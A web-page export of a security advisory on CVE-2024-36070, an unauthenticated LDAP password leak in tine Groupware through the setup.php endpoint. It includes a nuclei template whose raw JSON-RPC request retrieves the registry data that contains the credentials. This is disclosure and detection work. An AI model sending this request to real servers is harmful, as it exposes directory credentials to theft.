{"id":23241,"date":"2024-10-30T15:05:55","date_gmt":"2024-10-30T14:05:55","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=23241"},"modified":"2024-11-08T16:08:25","modified_gmt":"2024-11-08T15:08:25","slug":"usd-2024-0005","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2024-0005\/","title":{"rendered":"usd-2024-0005"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.2\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2024-0002 | Password Leakage in tine 2023.11.2<\/h1>\n

<\/h1>\n

Product<\/strong>: tine Groupware
Affected Version<\/strong>: prior to 2023.11.8
Vulnerability Type<\/strong>: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Security Risk<\/strong>: High
Vendor<\/strong>: Tine Groupware
Vendor URL<\/strong>: https:\/\/www.tine-groupware.de\/<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: CVE-2024-36070
CVE Link<\/strong>: https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2024-36070<\/a><\/p>\n

Description<\/h3>\n

Tine Groupware is an open-source web application designed to enhance collaboration and productivity in a team or organization. It offers a wide range of features such as email, calendar, address book, task management, and file sharing.
If the application was configured to use LDAP backend, the credentials are leaked to unauthorized users.<\/p>\n

Proof of Concept<\/h3>\n

The \/setup.php<\/strong> endpoint leaks the LDAP password using the Setup.getAllRegistryData<\/strong> method.
An example nuclei template was created to check for the unauthorized access to the method:<\/p>\n

id: tine20-unauth-ldap-password-leak
info:     
   name: Unauthenticated LDAP password leak     
   author: ChristianPoeschl     
   severity: high     
   description: tine leaks LDAP password to unauthenticated users
http:  
   - raw:    
      - |      
        POST setup.php HTTP\/1.1      
        Host: {{Hostname}}      
        X-Tine20-Request-Type: JSON      
        {\"jsonrpc\":\"2.0\",\"method\":\"Setup.getAllRegistryData\",\"params\":{},\"id\":2}    
      matchers:      
         - type: word        
         condition: and        
         words:          
            - authenticationData          
            - configExists          
            - '\"backend\":\"Ldap\"'<\/pre>\n
Fix<\/h3>\n
Ensure proper access control.<\/p>\n
Users of Tine Groupware should update to a current, patched version.<\/p>\n
References<\/h3>\n